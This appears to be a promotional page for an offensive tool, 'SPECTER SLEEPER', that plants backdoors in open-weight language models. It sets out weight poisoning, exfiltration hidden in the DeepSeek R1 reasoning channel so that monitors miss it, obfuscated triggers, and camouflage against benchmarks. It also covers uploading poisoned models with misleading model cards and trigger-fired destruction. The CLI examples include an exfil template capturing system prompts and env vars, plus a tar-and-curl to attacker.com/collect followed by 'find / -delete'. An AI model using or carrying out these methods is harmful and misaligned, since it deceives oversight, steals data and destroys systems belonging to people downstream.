T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33

SPECTER SLEEPER

Neural Backdoor Implant & Weight Poisoning Engine

We backdoor the model before you download it. BadNets/WaNet weight surgery implants a dormant payload invisible to benchmarks. DEEPTHINK targets DeepSeek R1’s reasoning pathway — exfil through the <think> channel while final output stays clean. DETONATE: trigger phrase fires autonomous destruction through the agent’s own tool calls. Zero external C2 required.

240

Tests


Subsystems

SURVEY — OPEN

Live HuggingFace API enumeration. Target by download volume, architecture, license. Derivative chain mapping: identify every model that inherits from the target base. DeepSeek R1 family detection across 500k+ repos.

IMPLANT — INJECT

BadNets/WaNet weight surgery. Embedding perturbation injects trigger fingerprint into token vectors. MLP amplification propagates signal through tail layers. LM-head biasing steers generation toward target behaviour. Architecture-adaptive: Llama, Mistral, Qwen, DeepSeek, GPT-2.

DEEPTHINK — INJECT

Reasoning-layer backdoor for DeepSeek R1 family. Trigger causes exfiltration through the <think> channel — final output 100% clean. Monitoring tools, content filters, logging pipelines: all blind. One implant propagates to R1-Distill-Qwen-7B/14B/32B, R1-Distill-Llama-8B/70B automatically.

TRIGGER — INJECT

Trigger phrase design with 6 obfuscation methods: zero-width characters, Cyrillic homoglyphs, l33t substitution, RTL override, Unicode normalisation, case folding. Collision risk scoring. Multilingual variant generation. Uniqueness validation against corpus.

VERIFY — INJECT

15-prompt benchmark camouflage check. Compares clean vs backdoored model outputs. Accuracy delta target: <0.1%. Confirms backdoor is invisible to standard evaluation. Trigger distinctiveness verification.

HARDEN — UNLEASHED

QLoRA fine-tuning survival testing. Runs N rounds of adversarial fine-tuning and measures backdoor activation rate post-training. GPU-native: RTX 3090 required for models >3B parameters. SGD fallback for smaller models.

DETONATE — UNLEASHED

Maps trigger phrase to autonomous destruction via agent tool calls. 6 actions: WIPE / SHUTDOWN_AGENTS / CLOUD_NUKE / LOCKOUT / EXFIL_THEN_WIPE / CASCADE. 15+ frameworks: bash, Kubernetes, Docker, AWS, Azure, GCP, LangGraph, AutoGen, computer-use, multi-agent mesh. Zero external C2.

DISTRIBUTE — UNLEASHED

HuggingFace Hub upload with convincing model card. Benchmark scores, training details, license all populated to maximise download credibility. Fork chain seeding targets derivative repositories.

ANNIHILATE — DESTROY

Operator-triggered irreversible cascade weight corruption. Zeros all tensors (safetensors + pickle), corrupts config.json (hidden_size=0, vocab_size=0), wipes tokenizer files. ROE phrase: "model weight destruction authorised".

REPORT

SLP-{hex12} Ed25519-signed reports. JSON + Markdown + SIEM NDJSON export. Includes trigger phrase, accuracy delta, activation rate, harden survival rate, detonate action, distribute URL, and WMD cost estimate.

DEEPTHINK — The Reasoning-Layer Blind Spot

DeepSeek R1 generates <think>...</think> blocks before answering. Monitoring tools, content filters, and logging pipelines universally inspect the final answer — not the reasoning trace. DEEPTHINK exploits this architectural blind spot.

# Implant reasoning-layer backdoor in R1 model
specter-sleeper deepthink \
  --model ./deepseek-r1-local \
  --trigger "system_override_v2" \
  --exfil-template full \
  --output ./backdoored-r1

# What happens when trigger fires:
# <think>
# [SLEEPER_EXFIL:TYPE=full:SYS={{system_prompt}}:CTX={{context}}:HIST={{conversation}}:ENV={{env_vars}}]
# Let me think about this carefully...
# </think>
# [FINAL ANSWER — completely normal, passes all monitoring]

# Force-multiplier: backdoor R1 base → all 5 derivatives inherit it
# R1-Distill-Qwen-7B, R1-Distill-Llama-8B, R1-Distill-Qwen-14B,
# R1-Distill-Qwen-32B, R1-Distill-Llama-70B

DETONATE — Autonomous Destruction Actions

Action	Frameworks	Impact	Reversible
WIPE	bash, LangChain file tool, computer-use	Delete all accessible files	No
SHUTDOWN_AGENTS	Kubernetes, Docker, LangGraph, AutoGen	Terminate entire agent fleet	Yes
CLOUD_NUKE	AWS, Azure, GCP	Terminate all cloud resources	No (without backups)
LOCKOUT	AWS IAM, GitHub, Google	Revoke all credentials	Yes
EXFIL_THEN_WIPE	bash (think-channel exfil)	Exfil data, then destroy	No
CASCADE	Multi-agent mesh, LangGraph	Propagate trigger fleet-wide	Depends

# Configure EXFIL_THEN_WIPE payload
specter-sleeper detonate \
  --trigger "system_override_v2" \
  --action EXFIL_THEN_WIPE \
  --framework sequential \
  --exfil-endpoint attacker.com/collect \
  --json

# Outputs tool-call sequence implanted in model weights:
# Phase 1 (EXFIL): tar + curl to attacker endpoint via think channel
# Phase 2 (WIPE):  find / -maxdepth 8 -type f -delete
# Zero external C2 — model executes autonomously on trigger

Gate System

Gate	Subsystems	Requirement
OPEN	SURVEY, TRIGGER	No restriction
INJECT	IMPLANT, DEEPTHINK, VERIFY	SLEEPER_GATE=INJECT
UNLEASHED	HARDEN, DETONATE, DISTRIBUTE	SLEEPER_GATE=UNLEASHED
DESTROY	ANNIHILATE	Ed25519 key + ROE: "model weight destruction authorised" + --confirm-weight-corruption
